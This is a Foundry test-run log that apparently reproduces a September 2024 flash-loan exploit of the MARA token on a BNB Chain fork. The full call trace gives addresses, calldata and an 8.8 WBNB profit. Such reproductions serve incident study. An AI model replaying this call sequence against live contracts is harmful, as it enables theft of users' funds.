Compiling 23 files with Solc 0.8.28
Solc 0.8.28 finished in 1.15s
Compiler run successful with warnings:
Warning (3420): Source file does not specify required compiler version! Consider adding "pragma solidity ^0.8.28;"
--> src/test/2024-09/MARA_exp.sol

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1084:5:
     |
1084 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:1896:5:
     |
1896 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2198:5:
     |
2198 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:2967:5:
     |
2967 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (2519): This declaration shadows an existing declaration.
    --> src/test/interface.sol:4424:5:
     |
4424 |     function WETH() external view returns (address);
     |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
Note: The shadowed declaration is here:
   --> src/test/interface.sol:805:1:
    |
805 | interface WETH {
    | ^ (Relevant source part starts here and spans across multiple lines).

Warning (3628): This contract has a payable fallback function, but no receive ether function. Consider adding a receive ether function.
  --> src/test/2024-09/MARA_exp.sol:10:1:
   |
10 | contract ContractTest is Test {
   | ^ (Relevant source part starts here and spans across multiple lines).
Note: The payable fallback function is defined here.
  --> src/test/2024-09/MARA_exp.sol:52:5:
   |
52 |     fallback() external payable {}
   |     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-09/MARA_exp.sol:33:31:
   |
33 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                               ^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-09/MARA_exp.sol:33:67:
   |
33 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                   ^^^^^^^^^^^^^^^^^^^

Warning (5667): Unused function parameter. Remove or comment out the variable name to silence this warning.
  --> src/test/2024-09/MARA_exp.sol:33:88:
   |
33 |     function DPPFlashLoanCall(address sender, uint256 baseAmount, uint256 quoteAmount, bytes calldata data) external {
   |                                                                                        ^^^^^^^^^^^^^^^^^^^


Ran 1 test for script/Exploit-template_new.sol:ExploitScript
[PASS] testExploit() (gas: 23756)
Logs:
  Attacker ETH Balance Before exploit: 0.000000000000000000
  Attacker ETH Balance After exploit: 0.000000000000000000

Traces:
  [7939] ExploitScript::setUp()
    ├─ [0] VM::createSelectFork("mainnet", 1234567 [1.234e6])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [23756] ExploitScript::testExploit()
    ├─ [0] VM::deal(ExploitScript: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0)
    │   └─ ← [Return]
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance Before exploit", val: 0, decimals: 18)
    ├─ emit log_named_decimal_uint(key: "Attacker ETH Balance After exploit", val: 0, decimals: 18)
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 1.16s (3.94ms CPU time)

Ran 1 test for src/test/2024-09/MARA_exp.sol:ContractTest
[PASS] testExploit() (gas: 256765)
Logs:
  [Begin] Attacker WBNB before exploit: 0.000000000000000000
  [End] Attacker WBNB after exploit: 8.800000000000000000

Traces:
  [5779] ContractTest::setUp()
    ├─ [0] VM::createSelectFork("bsc", 42538915 [4.253e7])
    │   └─ ← [Return] 0
    └─ ← [Stop]

  [285065] ContractTest::testExploit()
    ├─ [2534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 0
    ├─ emit log_named_decimal_uint(key: "[Begin] Attacker WBNB before exploit", val: 0, decimals: 18)
    ├─ [263643] 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476::flashLoan(11000000000000000000 [1.1e19], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000006098a5638d8d7e9ed2f952d35b2b67c34ec6b476000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c00000000000000000000000000000000000000000000000098a7d9b8314c0000)
    │   ├─ [260932] 0x85351262f7474Ebe23FfAcD633cf20A491F1325D::flashLoan(11000000000000000000 [1.1e19], 0, ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x0000000000000000000000006098a5638d8d7e9ed2f952d35b2b67c34ec6b476000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c00000000000000000000000000000000000000000000000098a7d9b8314c0000) [delegatecall]
    │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 11000000000000000000 [1.1e19])
    │   │   │   ├─ emit Transfer(from: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 11000000000000000000 [1.1e19])
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000098a7d9b8314c0000
    │   │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x00000000000000000000000000000000000000000000000e2d03b97594486079 → 0x00000000000000000000000000000000000000000000000d945bdfbd62fc6079
    │   │   │   └─ ← [Return] true
    │   │   ├─ [206535] ContractTest::DPPFlashLoanCall(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 11000000000000000000 [1.1e19], 0, 0x0000000000000000000000006098a5638d8d7e9ed2f952d35b2b67c34ec6b476000000000000000000000000bb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c00000000000000000000000000000000000000000000000098a7d9b8314c0000)
    │   │   │   ├─ [9181] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::withdraw(11000000000000000000 [1.1e19])
    │   │   │   │   ├─ [41] ContractTest::fallback{value: 11000000000000000000}()
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   ├─ emit Withdrawal(src: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], wad: 11000000000000000000 [1.1e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000098a7d9b8314c0000 → 0
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [24420] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::approve(0x10ED43C718714eb63d5aA57B78B54704E256024E, 10000000000000000000000000000 [1e28])
    │   │   │   │   ├─ emit Approval(owner: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], spender: 0x10ED43C718714eb63d5aA57B78B54704E256024E, value: 10000000000000000000000000000 [1e28])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x0072fde0c25a54a99a0517f551c3cabc4c49d9ef3648fd789a3f57d0243cdb90: 0 → 0x0000000000000000000000000000000000000000204fce5e3e25026110000000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─ [76263] 0xc6A8C02dd5A3DD1616eC072BFC7c9d3DF9682A63::5fc985ea{value: 11000000000000000000}(000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000000020000000000000000000000006e82575ffa729471b9b412d689ec692225b1ffcb0000000000000000000000006e82575ffa729471b9b412d689ec692225b1ffcb0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000)
    │   │   │   │   ├─ [71172] 0xA3f6Af29001874Ed06C1bF41427e33256B1D97D4::5fc985ea{value: 11000000000000000000}(000000000000000000000000000000000000000000000000000000000000006000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000000000000000000000000000000000000000012000000000000000000000000000000000000000000000000000000000000000020000000000000000000000006e82575ffa729471b9b412d689ec692225b1ffcb0000000000000000000000006e82575ffa729471b9b412d689ec692225b1ffcb0000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000a000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000) [delegatecall]
    │   │   │   │   │   ├─ [26916] 0x47E72A0D0ce0080E74B06C367dbEfc68B9c2d0d3::5ebde635(00000000000000000000000000000000000000000000008f1d5c1cae374000000000000000000000000000006e82575ffa729471b9b412d689ec692225b1ffcb0000000000000000000000000000000000000000000000000000000000000002)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x6E82575Ffa729471b9B412d689EC692225b1fFcB, value: 2640000000000000000000 [2.64e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5f3482c8d978a86a5aa972bfdadedd2a00ca2eddf2f53fe418ab5c523b239e2e: 0 → 0x00000000000000000000000000000000000000000000008f1d5c1cae37400000
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   │   ├─ [3016] 0x47E72A0D0ce0080E74B06C367dbEfc68B9c2d0d3::5ebde635(00000000000000000000000000000000000000000000008f1d5c1cae374000000000000000000000000000006e82575ffa729471b9b412d689ec692225b1ffcb0000000000000000000000000000000000000000000000000000000000000002)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: 0x6E82575Ffa729471b9B412d689EC692225b1fFcB, value: 2640000000000000000000 [2.64e21])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x5f3482c8d978a86a5aa972bfdadedd2a00ca2eddf2f53fe418ab5c523b239e2e: 0x00000000000000000000000000000000000000000000008f1d5c1cae37400000 → 0x00000000000000000000000000000000000000000000011e3ab8395c6e800000
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   │   ├─ [24916] 0x47E72A0D0ce0080E74B06C367dbEfc68B9c2d0d3::5ebde635(00000000000000000000000000000000000000000000059725991ece288000000000000000000000000000007fa9385be102ac3eac297483dd6233d62b3e14960000000000000000000000000000000000000000000000000000000000000002)
    │   │   │   │   │   │   ├─ emit Transfer(from: 0x0000000000000000000000000000000000000000, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 26400000000000000000000 [2.64e22])
    │   │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   │   @ 0x9a37937c0ede8c307bf0496ec60e131422d44420befc187978dc5326d56d38a4: 0 → 0x00000000000000000000000000000000000000000000059725991ece28800000
    │   │   │   │   │   │   └─ ← [Return] 0x0000000000000000000000000000000000000000000000000000000000000001
    │   │   │   │   │   ├─ emit BuyToken(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 26400000000000000000000 [2.64e22])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x5f3482c8d978a86a5aa972bfdadedd2a00ca2eddf2f53fe418ab5c523b239e2e: 0 → 0x00000000000000000000000000000000000000000000011e3ab8395c6e800000
    │   │   │   │   │   └─ ← [Stop]
    │   │   │   │   └─ ← [Return]
    │   │   │   ├─ [68668] 0x6E82575Ffa729471b9B412d689EC692225b1fFcB::swap(0, 19800000000000000000 [1.98e19], ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 0x)
    │   │   │   │   ├─ [27962] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], 19800000000000000000 [1.98e19])
    │   │   │   │   │   ├─ emit Transfer(from: 0x6E82575Ffa729471b9B412d689EC692225b1fFcB, to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], value: 19800000000000000000 [1.98e19])
    │   │   │   │   │   ├─  storage changes:
    │   │   │   │   │   │   @ 0x99e44110a46b00f124313abd5ced746912e250719ec776cf670b510e9c8fdb5a: 0x000000000000000000000000000000000000000000000002868248b5e6c778c3 → 0x00000000000000000000000000000000000000000000000173ba8d9d8e0b78c3
    │   │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0 → 0x00000000000000000000000000000000000000000000000112c7bb1858bc0000
    │   │   │   │   │   └─ ← [Return] true
    │   │   │   │   ├─ [4860] 0x47E72A0D0ce0080E74B06C367dbEfc68B9c2d0d3::balanceOf(0x6E82575Ffa729471b9B412d689EC692225b1fFcB) [staticcall]
    │   │   │   │   │   └─ ← [Return] 12388468712344127575371 [1.238e22]
    │   │   │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6E82575Ffa729471b9B412d689EC692225b1fFcB) [staticcall]
    │   │   │   │   │   └─ ← [Return] 26785877441571944643 [2.678e19]
    │   │   │   │   ├─ emit Sync(reserve0: 12388468712344127575371 [1.238e22], reserve1: 26785877441571944643 [2.678e19])
    │   │   │   │   ├─ emit Swap(sender: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], amount0In: 5280000000000000000000 [5.28e21], amount1In: 0, amount0Out: 0, amount1Out: 19800000000000000000 [1.98e19], to: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 8: 0x66f2de7f000000000002868248b5e6c778c300000000018159d207987a20954b → 0x66f2ec1000000000000173ba8d9d8e0b78c300000000029f948a40f4e8a0954b
    │   │   │   │   │   @ 10: 0x0000000000000000000000000000276f1cf77b4db674f75c80446db2525809c4 → 0x00000000000000000000000000002777330b4f0c57c424be64bf591377d57fcf
    │   │   │   │   │   @ 9: 0x000000000000000000000000000000003d9901e63a5549555153a7da25b7927a → 0x000000000000000000000000000000003dafc49a81b724adb11e772231bf457c
    │   │   │   │   └─ ← [Stop]
    │   │   │   ├─ [3262] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::transfer(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, 11000000000000000000 [1.1e19])
    │   │   │   │   ├─ emit Transfer(from: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], to: 0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476, value: 11000000000000000000 [1.1e19])
    │   │   │   │   ├─  storage changes:
    │   │   │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x00000000000000000000000000000000000000000000000d945bdfbd62fc6079 → 0x00000000000000000000000000000000000000000000000e2d03b97594486079
    │   │   │   │   │   @ 0x1da434b76eba4736d6e760bfd78cbf883a0776ee1666a9157f99ab1b97923a3c: 0x00000000000000000000000000000000000000000000000112c7bb1858bc0000 → 0x0000000000000000000000000000000000000000000000007a1fe16027700000
    │   │   │   │   └─ ← [Return] true
    │   │   │   ├─  storage changes:
    │   │   │   │   @ 12: 0 → 1
    │   │   │   └─ ← [Stop]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 261498057103220695161 [2.614e20]
    │   │   ├─ [2531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 234142660784736896904422 [2.341e23]
    │   │   ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 261498057103220695161 [2.614e20]
    │   │   ├─ [531] 0x55d398326f99059fF775485246999027B3197955::balanceOf(0x6098A5638d8D7e9Ed2f952d35B2b67c34EC6B476) [staticcall]
    │   │   │   └─ ← [Return] 234142660784736896904422 [2.341e23]
    │   │   ├─ emit DODOFlashLoan(: ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496], : 11000000000000000000 [1.1e19], : 0)
    │   │   ├─  storage changes:
    │   │   │   @ 0x5c79f3f522b9104472f925e5aa96e2626794acdb6a7d9f181cfee783d3583c15: 0x00000000000000000000000000000000000000000000000d945bdfbd62fc6079 → 0x00000000000000000000000000000000000000000000000e2d03b97594486079
    │   │   └─ ← [Stop]
    │   └─ ← [Return]
    ├─ [534] 0xbb4CdB9CBd36B01bD1cBaEBF2De08d9173bc095c::balanceOf(ContractTest: [0x7FA9385bE102ac3EAc297483Dd6233D62b3e1496]) [staticcall]
    │   └─ ← [Return] 8800000000000000000 [8.8e18]
    ├─ emit log_named_decimal_uint(key: "[End] Attacker WBNB after exploit", val: 8800000000000000000 [8.8e18], decimals: 18)
    ├─  storage changes:
    │   @ 1: 0x0000000000000000000001010000000000000000000000000000000000000000 → 0x0000000000000000000000010000000000000000000000000000000000000000
    └─ ← [Stop]

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 11.43s (9.31s CPU time)

Ran 2 test suites in 12.53s (12.59s CPU time): 2 tests passed, 0 failed, 0 skipped (2 total tests)
